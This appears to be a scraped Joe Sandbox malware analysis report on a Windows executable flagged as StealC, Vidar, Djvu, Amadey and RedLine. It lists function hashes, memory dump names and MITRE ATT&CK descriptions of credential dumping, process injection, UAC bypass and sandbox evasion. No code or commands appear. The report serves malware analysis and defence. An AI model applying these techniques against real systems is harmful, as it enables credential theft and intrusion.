Opcode ID: d457b1cd2c66fb7c40922b88a6e7aab80ce5e5a5414286f970676c13512b85b0
Instruction ID: 4d27e0d519b02d005db0e680efede9bdcd9c9df1c7b691dc9cb1c6c0e4018372
Opcode Fuzzy Hash: d457b1cd2c66fb7c40922b88a6e7aab80ce5e5a5414286f970676c13512b85b0
Instruction Fuzzy Hash: 3C212472504200DFCB51DF48D994B2ABBB5FB84320F20C96ADD090F252D336D406C7A2

Function 0155D005 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2137800566.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_155d000_Dc25WcfSyV8lvRa9ThM7DR04.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 171330916a615e2cd2642bdf84d5b06c57d1253d4e09a1d627549a304ccd5079
Instruction ID: e26cce576042fada745912d5946b0a563245b26e863495fbf9bb3b04cc7608b3
Opcode Fuzzy Hash: 171330916a615e2cd2642bdf84d5b06c57d1253d4e09a1d627549a304ccd5079
Instruction Fuzzy Hash: 2021A1725083809FDB03DF14D994B15BF71FB86320F2881EAD8454F267D33A981ACB62

Function 057A50E7 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2351057030.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_57a0000_Dc25WcfSyV8lvRa9ThM7DR04.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fcc4cbb19ebdca3def55031619c659833b649a76bcb5bb9c9291b0a6dd2d249
Instruction ID: 0d336806301f8177cc2aa29d72a78372873e28c3130bf83a0fbf9ab386633bdc
Opcode Fuzzy Hash: 4fcc4cbb19ebdca3def55031619c659833b649a76bcb5bb9c9291b0a6dd2d249
Instruction Fuzzy Hash: FBF01931D14209EECF11EFA8D805ADDBBB1AB15300F4081AAE81467221E7359AA8EB81

Function 057AFD78 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2351057030.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_57a0000_Dc25WcfSyV8lvRa9ThM7DR04.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 621a57bc29241e7d1c0b02c27b26aad9fd605d8d88f0fd5e0415902feb98d203
Instruction ID: 34868a89d222fc0222963f2dff2ace76d3a4b1e09414610656085fa87c0eb5dd
Opcode Fuzzy Hash: 621a57bc29241e7d1c0b02c27b26aad9fd605d8d88f0fd5e0415902feb98d203
Instruction Fuzzy Hash: 23E0653A3141A8BB9F061E559814CBE7F6BEFC9221704C015FD55C2211DF31C921B7A1

Function 057AFD6B Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2351057030.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_57a0000_Dc25WcfSyV8lvRa9ThM7DR04.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 497b79c4821d6aff1105404e216cf63865407992b3dd4c12d9d2c76c16e1fcfa
Instruction ID: 8ec63ebdbbe4338a868714df29535d332b25fd18b15a784029fec979ee139d0b
Opcode Fuzzy Hash: 497b79c4821d6aff1105404e216cf63865407992b3dd4c12d9d2c76c16e1fcfa
Instruction Fuzzy Hash: E9E0D83B2142A47BDF061A55F825E7E3F6BABD5311F08812AFC06C2301DE30C810A361

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Threatname: Djvu

Threatname: Amadey

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Change of critical system settings

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Change of critical system settings

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Windows Analysis Report
284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\data\config.txt

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre